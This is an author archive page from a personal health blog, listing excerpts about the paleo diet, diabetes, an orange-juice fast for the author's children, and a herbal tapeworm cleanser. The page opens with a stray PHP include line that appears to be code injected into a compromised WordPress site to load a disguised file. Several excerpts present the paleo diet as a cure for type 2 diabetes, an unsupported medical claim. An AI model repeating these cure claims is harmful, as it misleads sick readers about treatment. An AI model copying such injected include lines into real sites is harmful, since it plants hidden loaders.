@include(ABSPATH . WPINC .'/class-wp-xmlrpc.php'); Good Samaritan, Author at My Family Health Blog - Page 27 of 235

Author: Good Samaritan

Diabetes Cure Kick in the Butt Requested at a Paleo Diet Forum

Seems diabetes sufferers are finally discovering the paleo diet and are trickling into Caveman Forum. Good for them. Here is Tony requesting for a “kick in the butt” to launch / inspire him to go with paleo diet to address his type 2 diabetes problem. My name is Tony,...

Diabetes Cure via Paleo Diet Testimonial and Realization

Someone over at Caveman Forum (cooked paleo diet forum) hadn’t realized it yet, but he was reporting his own diabetes type II cure as it happened. His mental blue print just wasn’t there yet to recognize it. It’s a fun read: Interesting blood sugar test results…...

Need a Chiropractor Appointment for My Neck

A few weeks ago I was carrying heavy stuff and I slipped on the front porch. I banged my left hip and backed the left side of my face, my cheek bone on the porch. I didn’t think much of it and thought, well, my body can take it....

Gained Weight on Raw Paleo Diet in 2011

I’m happy to report I achieved the weight gain I yearned for in the past 2011. I started 2011 with some tape worms and at 124 pounds. I got rid of the tape worms with a herbal parasite cleanser. That allowed me to gain some weight. When durian season...

New Year Orange Juice Fast with my 2 Boys and Hard Core Raw Paleo Diet

Tomorrow January 2 I will be personally executing an orange juice fast using Sagada oranges. This morning I got 32 oranges on sale from my suki / favorite seller at the market. I’ll probably be on the same orange juice fast myself to accompany them. Just 1 day will...

Christmas Ham May Kill Your Dog, So Why Are We Humans Eating Ham?

Christmas eve and the entire extended family was having the big dinner.  This dinner included a very high priced premium brand of ham which came from a very prominent politician.  Some nephews joined in and they had a small toy dog with them called “Smalley”.  My brother in law...